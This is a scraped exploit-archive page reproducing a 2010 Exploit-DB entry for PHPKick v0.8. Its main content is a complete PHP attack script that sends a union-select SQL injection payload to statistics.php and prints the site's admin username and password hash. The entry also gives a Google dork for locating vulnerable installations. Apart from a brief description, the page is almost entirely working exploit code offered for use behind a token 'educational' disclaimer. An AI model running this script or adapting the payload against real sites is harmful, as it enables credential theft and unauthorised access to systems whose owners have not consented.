Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PHPKick v0.8 statistics.php SQL Injection - exploit.company
header-logo
Suggest Exploit
vendor:
PHPKick
by:
garwga
N/A
CVSS
N/A
SQL Injection
Unknown
CWE
Product Name: PHPKick
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

PHPKick v0.8 statistics.php SQL Injection

This exploit allows an attacker to perform SQL injection on the statistics.php file in PHPKick v0.8. It works regardless of the PHP security settings, including magic_quotes and register_globals. This exploit is for educational purposes only and should not be used without permission. The exploit was found by garwga (ICQ#:453-144-667).

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
 
<?php
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n\n\n";
 
 
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
	$host=$_SERVER['argv'][1];
	$path=$_SERVER['argv'][2];
    $spos=strpos($host, "http://");
  	if(!is_int($spos)&&($spos==0)){
	   $host="http://$host";
  	  }
	if(!$host=="http://localhost"){
	   $spos=strpos($host, "http://www.");
  	   if (!is_int($spos)&&($spos==0)){
	      $host="http://www.$host";
  	      }
	  }
	$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
	echo"exploiting...\n";
	$source=file_get_contents($host.$path.$exploit);
	$username=GetBetween($source," :<br>",":");
	echo "username: $username\n";
	$hash=GetBetween($source,"<br>$username:","</td>");
	echo"hash: $hash\n";
	}
else{
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n";
}
function GetBetween($content,$start,$end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
    }
    return '';
}
?>

Navigation

Suggest Exploit

Services By CQR